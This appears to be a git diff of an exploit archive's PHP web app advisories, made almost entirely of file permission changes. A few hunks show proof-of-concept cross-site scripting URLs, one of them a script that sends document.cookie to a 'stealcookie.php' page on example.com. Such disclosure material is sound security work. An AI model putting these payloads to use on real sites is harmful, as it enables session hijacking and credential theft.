diff --git a/platforms/php/webapps/27252.txt b/platforms/php/webapps/27252.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27254.txt b/platforms/php/webapps/27254.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27255.txt b/platforms/php/webapps/27255.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27256.txt b/platforms/php/webapps/27256.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27259.txt b/platforms/php/webapps/27259.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2726.txt b/platforms/php/webapps/2726.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27260.txt b/platforms/php/webapps/27260.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27261.txt b/platforms/php/webapps/27261.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27262.txt b/platforms/php/webapps/27262.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27263.txt b/platforms/php/webapps/27263.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27264.txt b/platforms/php/webapps/27264.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27265.txt b/platforms/php/webapps/27265.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27266.txt b/platforms/php/webapps/27266.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27267.txt b/platforms/php/webapps/27267.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27268.txt b/platforms/php/webapps/27268.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27269.txt b/platforms/php/webapps/27269.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2727.txt b/platforms/php/webapps/2727.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27272.txt b/platforms/php/webapps/27272.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27274.txt b/platforms/php/webapps/27274.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27275.txt b/platforms/php/webapps/27275.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27276.html b/platforms/php/webapps/27276.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27279.txt b/platforms/php/webapps/27279.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2728.txt b/platforms/php/webapps/2728.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27281.txt b/platforms/php/webapps/27281.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27287.txt b/platforms/php/webapps/27287.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27290.txt b/platforms/php/webapps/27290.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27298.txt b/platforms/php/webapps/27298.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27299.txt b/platforms/php/webapps/27299.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27300.txt b/platforms/php/webapps/27300.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27301.txt b/platforms/php/webapps/27301.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27302.txt b/platforms/php/webapps/27302.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27303.txt b/platforms/php/webapps/27303.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27304.html b/platforms/php/webapps/27304.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27305.txt b/platforms/php/webapps/27305.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27306.txt b/platforms/php/webapps/27306.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27307.txt b/platforms/php/webapps/27307.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27308.txt b/platforms/php/webapps/27308.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27309.txt b/platforms/php/webapps/27309.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27311.txt b/platforms/php/webapps/27311.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27312.txt b/platforms/php/webapps/27312.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27313.txt b/platforms/php/webapps/27313.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27314.txt b/platforms/php/webapps/27314.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27315.txt b/platforms/php/webapps/27315.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27318.txt b/platforms/php/webapps/27318.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2732.txt b/platforms/php/webapps/2732.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27321.txt b/platforms/php/webapps/27321.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27322.txt b/platforms/php/webapps/27322.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27323.txt b/platforms/php/webapps/27323.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27324.txt b/platforms/php/webapps/27324.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27327.txt b/platforms/php/webapps/27327.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27328.txt b/platforms/php/webapps/27328.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2733.txt b/platforms/php/webapps/2733.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27330.txt b/platforms/php/webapps/27330.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27331.txt b/platforms/php/webapps/27331.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27332.txt b/platforms/php/webapps/27332.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27333.txt b/platforms/php/webapps/27333.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27336.txt b/platforms/php/webapps/27336.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27337.txt b/platforms/php/webapps/27337.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27338.txt b/platforms/php/webapps/27338.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27339.txt b/platforms/php/webapps/27339.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27340.txt b/platforms/php/webapps/27340.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27341.txt b/platforms/php/webapps/27341.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27342.txt b/platforms/php/webapps/27342.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27343.txt b/platforms/php/webapps/27343.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27344.txt b/platforms/php/webapps/27344.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27345.txt b/platforms/php/webapps/27345.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27346.txt b/platforms/php/webapps/27346.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27347.txt b/platforms/php/webapps/27347.txt old mode 100755 new mode 100644 index c11071842..807d687a6 --- a/platforms/php/webapps/27347.txt +++ b/platforms/php/webapps/27347.txt @@ -4,4 +4,4 @@ VBZooM Forum is prone to multiple cross-site scripting vulnerabilities. These is An attacker may leverage any of these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/vz/comment.php?UserID='>XSS \ No newline at end of file +http://www.example.com/vz/comment.php?UserID='>XSS \ No newline at end of file diff --git a/platforms/php/webapps/27348.txt b/platforms/php/webapps/27348.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27354.txt b/platforms/php/webapps/27354.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27355.txt b/platforms/php/webapps/27355.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27356.txt b/platforms/php/webapps/27356.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27357.txt b/platforms/php/webapps/27357.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27358.txt b/platforms/php/webapps/27358.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27359.txt b/platforms/php/webapps/27359.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2736.txt b/platforms/php/webapps/2736.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27360.txt b/platforms/php/webapps/27360.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27361.txt b/platforms/php/webapps/27361.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27362.txt b/platforms/php/webapps/27362.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27363.txt b/platforms/php/webapps/27363.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27364.txt b/platforms/php/webapps/27364.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27367.txt b/platforms/php/webapps/27367.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27368.txt b/platforms/php/webapps/27368.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27369.txt b/platforms/php/webapps/27369.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27370.txt b/platforms/php/webapps/27370.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27371.txt b/platforms/php/webapps/27371.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27372.txt b/platforms/php/webapps/27372.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27373.txt b/platforms/php/webapps/27373.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27374.txt b/platforms/php/webapps/27374.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27375.txt b/platforms/php/webapps/27375.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27379.txt b/platforms/php/webapps/27379.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27380.txt b/platforms/php/webapps/27380.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27381.txt b/platforms/php/webapps/27381.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27382.txt b/platforms/php/webapps/27382.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27383.txt b/platforms/php/webapps/27383.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27384.txt b/platforms/php/webapps/27384.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27385.txt b/platforms/php/webapps/27385.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27386.txt b/platforms/php/webapps/27386.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27387.txt b/platforms/php/webapps/27387.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27388.txt b/platforms/php/webapps/27388.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27389.txt b/platforms/php/webapps/27389.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2739.txt b/platforms/php/webapps/2739.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27390.txt b/platforms/php/webapps/27390.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27391.txt b/platforms/php/webapps/27391.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27392.txt b/platforms/php/webapps/27392.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27393.txt b/platforms/php/webapps/27393.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27394.txt b/platforms/php/webapps/27394.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27395.txt b/platforms/php/webapps/27395.txt old mode 100755 new mode 100644 index 588d4a078..8c2feba08 --- a/platforms/php/webapps/27395.txt +++ b/platforms/php/webapps/27395.txt @@ -12,4 +12,4 @@ http://www.example.com/dcp-portal611/mycontents.php?action=addnews&content_inici http://www.example.com/dcp-portal611/mycontents.php?action=addnews&mode=write&dcp_editor_contingut_html=xyz&c_name=<script>document.location="http://www.example.com/stealcookie.php?"%2bdocument.cookie</script>&c_image_name= http://www.example.com/dcp-portal611/mycontents.php?action=addanns&c_name="><script>document.location="http://www.example.com/stealcookie.php?"%2bdocument.cookie</script> http://www.example.com/dcp-portal611/mycontents.php?action=updatecontent&cid="><script>document.location="http://www.example.com/stealcookie.php?"%2bdocument.cookie</script> -http://www.example.com/dcp-portal611/mycontents.php?action=updatecontent&cid=1&mode=write&c_image_name=xyz&c_name="><script>document.location="http://www.example.com/stealcookie.php?"%2bdocument.cookie</script> \ No newline at end of file +http://www.example.com/dcp-portal611/mycontents.php?action=updatecontent&cid=1&mode=write&c_image_name=xyz&c_name="><script>document.location="http://www.example.com/stealcookie.php?"%2bdocument.cookie</script> \ No newline at end of file diff --git a/platforms/php/webapps/27396.txt b/platforms/php/webapps/27396.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27398.txt b/platforms/php/webapps/27398.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27399.txt b/platforms/php/webapps/27399.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2740.txt b/platforms/php/webapps/2740.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27403.txt b/platforms/php/webapps/27403.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27405.txt b/platforms/php/webapps/27405.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27408.txt b/platforms/php/webapps/27408.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27409.txt b/platforms/php/webapps/27409.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2741.txt b/platforms/php/webapps/2741.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27410.txt b/platforms/php/webapps/27410.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27411.txt b/platforms/php/webapps/27411.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27412.txt b/platforms/php/webapps/27412.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27413.txt b/platforms/php/webapps/27413.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27414.txt b/platforms/php/webapps/27414.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27415.txt b/platforms/php/webapps/27415.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27416.txt b/platforms/php/webapps/27416.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27417.txt b/platforms/php/webapps/27417.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27419.txt b/platforms/php/webapps/27419.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2742.txt b/platforms/php/webapps/2742.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27422.txt b/platforms/php/webapps/27422.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27423.txt b/platforms/php/webapps/27423.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27424.txt b/platforms/php/webapps/27424.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27427.txt b/platforms/php/webapps/27427.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27430.txt b/platforms/php/webapps/27430.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27431.txt b/platforms/php/webapps/27431.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27434.txt b/platforms/php/webapps/27434.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27435.txt b/platforms/php/webapps/27435.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27436.txt b/platforms/php/webapps/27436.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27437.txt b/platforms/php/webapps/27437.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27438.txt b/platforms/php/webapps/27438.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27439.txt b/platforms/php/webapps/27439.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2744.txt b/platforms/php/webapps/2744.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27440.txt b/platforms/php/webapps/27440.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27441.txt b/platforms/php/webapps/27441.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27442.txt b/platforms/php/webapps/27442.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27443.txt b/platforms/php/webapps/27443.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27444.txt b/platforms/php/webapps/27444.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27445.txt b/platforms/php/webapps/27445.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27446.txt b/platforms/php/webapps/27446.txt old mode 100755 new mode 100644 index 135fd0eff..a62ded561 --- a/platforms/php/webapps/27446.txt +++ b/platforms/php/webapps/27446.txt @@ -8,4 +8,4 @@ http://www.example.com/music/index.php?id='><script>alert(document.cookie)</scri http://www.example.com/music/index.php?action=top&show=5&type='><script>alert(d ocument.cookie)</script> -http://www.example.com/music/index.php?action=top&show='><script>alert(document .cookie)</script>&type=Artists \ No newline at end of file +http://www.example.com/music/index.php?action=top&show='><script>alert(document .cookie)</script>&type=Artists \ No newline at end of file diff --git a/platforms/php/webapps/27447.txt b/platforms/php/webapps/27447.txt old mode 100755 new mode 100644 index b06060453..3c188869d --- a/platforms/php/webapps/27447.txt +++ b/platforms/php/webapps/27447.txt @@ -6,4 +6,4 @@ Successful exploitation of these vulnerabilities could allow an attacker to comp http://www.example.com/music/cart/cart.php?message1='><script>alert(document.cookie) </script> -http://www.example.com/music/cart/cart.php?message='><script>alert(document.cookie)</script> \ No newline at end of file +http://www.example.com/music/cart/cart.php?message='><script>alert(document.cookie)</script> \ No newline at end of file diff --git a/platforms/php/webapps/27448.txt b/platforms/php/webapps/27448.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27449.txt b/platforms/php/webapps/27449.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2745.txt b/platforms/php/webapps/2745.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27450.txt b/platforms/php/webapps/27450.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27454.txt b/platforms/php/webapps/27454.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27458.txt b/platforms/php/webapps/27458.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27459.txt b/platforms/php/webapps/27459.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27462.txt b/platforms/php/webapps/27462.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27465.txt b/platforms/php/webapps/27465.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27466.txt b/platforms/php/webapps/27466.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27467.txt b/platforms/php/webapps/27467.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27468.txt b/platforms/php/webapps/27468.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2747.txt b/platforms/php/webapps/2747.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27475.txt b/platforms/php/webapps/27475.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27477.txt b/platforms/php/webapps/27477.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27478.txt b/platforms/php/webapps/27478.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27483.txt b/platforms/php/webapps/27483.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27484.txt b/platforms/php/webapps/27484.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27485.txt b/platforms/php/webapps/27485.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27492.txt b/platforms/php/webapps/27492.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27494.txt b/platforms/php/webapps/27494.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27495.txt b/platforms/php/webapps/27495.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27496.txt b/platforms/php/webapps/27496.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27497.txt b/platforms/php/webapps/27497.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27498.txt b/platforms/php/webapps/27498.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27499.txt b/platforms/php/webapps/27499.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2750.txt b/platforms/php/webapps/2750.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27500.txt b/platforms/php/webapps/27500.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27501.txt b/platforms/php/webapps/27501.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27502.txt b/platforms/php/webapps/27502.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27503.txt b/platforms/php/webapps/27503.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27504.txt b/platforms/php/webapps/27504.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27505.txt b/platforms/php/webapps/27505.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27506.txt b/platforms/php/webapps/27506.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27507.txt b/platforms/php/webapps/27507.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27509.txt b/platforms/php/webapps/27509.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2751.txt b/platforms/php/webapps/2751.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27510.txt b/platforms/php/webapps/27510.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27511.txt b/platforms/php/webapps/27511.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27512.txt b/platforms/php/webapps/27512.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27513.txt b/platforms/php/webapps/27513.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27514.txt b/platforms/php/webapps/27514.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27515.txt b/platforms/php/webapps/27515.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27518.txt b/platforms/php/webapps/27518.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27519.txt b/platforms/php/webapps/27519.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2752.txt b/platforms/php/webapps/2752.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27521.txt b/platforms/php/webapps/27521.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27522.txt b/platforms/php/webapps/27522.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27525.txt b/platforms/php/webapps/27525.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27531.txt b/platforms/php/webapps/27531.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27532.txt b/platforms/php/webapps/27532.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27533.txt b/platforms/php/webapps/27533.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27534.txt b/platforms/php/webapps/27534.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27535.txt b/platforms/php/webapps/27535.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27537.txt b/platforms/php/webapps/27537.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27538.txt b/platforms/php/webapps/27538.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27539.txt b/platforms/php/webapps/27539.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27540.txt b/platforms/php/webapps/27540.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27541.txt b/platforms/php/webapps/27541.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27542.txt b/platforms/php/webapps/27542.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27543.txt b/platforms/php/webapps/27543.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27544.txt b/platforms/php/webapps/27544.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27545.txt b/platforms/php/webapps/27545.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27546.txt b/platforms/php/webapps/27546.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27548.txt b/platforms/php/webapps/27548.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27549.txt b/platforms/php/webapps/27549.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27550.txt b/platforms/php/webapps/27550.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27551.txt b/platforms/php/webapps/27551.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27560.txt b/platforms/php/webapps/27560.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27563.txt b/platforms/php/webapps/27563.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27567.txt b/platforms/php/webapps/27567.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27570.txt b/platforms/php/webapps/27570.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27571.txt b/platforms/php/webapps/27571.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27572.txt b/platforms/php/webapps/27572.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27573.txt b/platforms/php/webapps/27573.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27574.txt b/platforms/php/webapps/27574.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27575.txt b/platforms/php/webapps/27575.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27576.txt b/platforms/php/webapps/27576.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27578.txt b/platforms/php/webapps/27578.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27579.txt b/platforms/php/webapps/27579.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2758.php b/platforms/php/webapps/2758.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27580.txt b/platforms/php/webapps/27580.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27582.txt b/platforms/php/webapps/27582.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27584.txt b/platforms/php/webapps/27584.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27585.txt b/platforms/php/webapps/27585.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27586.txt b/platforms/php/webapps/27586.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27587.txt b/platforms/php/webapps/27587.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27588.txt b/platforms/php/webapps/27588.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27589.txt b/platforms/php/webapps/27589.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2759.php b/platforms/php/webapps/2759.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27590.txt b/platforms/php/webapps/27590.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27591.txt b/platforms/php/webapps/27591.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27592.txt b/platforms/php/webapps/27592.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27593.txt b/platforms/php/webapps/27593.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27597.txt b/platforms/php/webapps/27597.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27598.txt b/platforms/php/webapps/27598.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2760.php b/platforms/php/webapps/2760.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27600.txt b/platforms/php/webapps/27600.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27601.txt b/platforms/php/webapps/27601.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27602.txt b/platforms/php/webapps/27602.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27603.txt b/platforms/php/webapps/27603.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27605.txt b/platforms/php/webapps/27605.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27612.txt b/platforms/php/webapps/27612.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27613.txt b/platforms/php/webapps/27613.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27614.txt b/platforms/php/webapps/27614.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27615.txt b/platforms/php/webapps/27615.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27616.txt b/platforms/php/webapps/27616.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27617.txt b/platforms/php/webapps/27617.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27618.txt b/platforms/php/webapps/27618.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27619.txt b/platforms/php/webapps/27619.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27621.txt b/platforms/php/webapps/27621.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27622.txt b/platforms/php/webapps/27622.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27623.txt b/platforms/php/webapps/27623.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27624.txt b/platforms/php/webapps/27624.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27625.txt b/platforms/php/webapps/27625.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27626.txt b/platforms/php/webapps/27626.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27628.txt 